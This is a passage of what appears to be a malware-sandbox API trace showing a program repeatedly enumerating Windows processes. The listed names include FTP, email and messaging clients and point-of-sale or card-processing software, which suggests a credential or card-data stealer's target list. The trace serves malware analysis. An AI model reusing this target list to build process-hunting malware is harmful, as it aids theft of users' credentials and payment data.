hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0161.989] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0161.992] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0161.994] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0161.996] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0161.998] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0162.001] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0162.003] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0162.005] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0162.007] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0162.009] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0162.011] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0162.013] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0162.018] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0162.020] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0162.023] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0162.025] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0162.028] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0162.031] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0162.035] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0162.038] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0162.040] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0162.043] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0162.046] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0162.048] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0162.051] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0162.056] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0162.058] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0162.061] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0162.063] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0162.067] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0162.069] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0162.072] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0162.074] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0162.077] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0162.080] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0162.082] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0162.085] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0162.088] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0162.091] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0162.097] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0162.100] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0162.104] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0162.107] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0162.110] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0162.112] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0162.114] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0162.117] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0162.119] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0162.122] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0162.124] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0162.126] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0162.129] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0162.132] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0162.138] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0162.140] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0162.143] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0162.145] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0162.147] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0162.149] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0162.152] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0162.154] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0162.158] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0162.160] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.162] Process32Next (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0162.165] CloseHandle (hObject=0x1ed4) returned 1 [0162.165] Sleep (dwMilliseconds=0x64) [0162.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cec [0162.280] Process32First (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.282] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.283] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.285] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.286] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.288] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.290] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.292] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.293] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.298] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.300] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.302] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.304] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.347] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.351] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.353] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.355] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.357] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.360] Process32Next (in: hSnapshot=0x1cec, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, 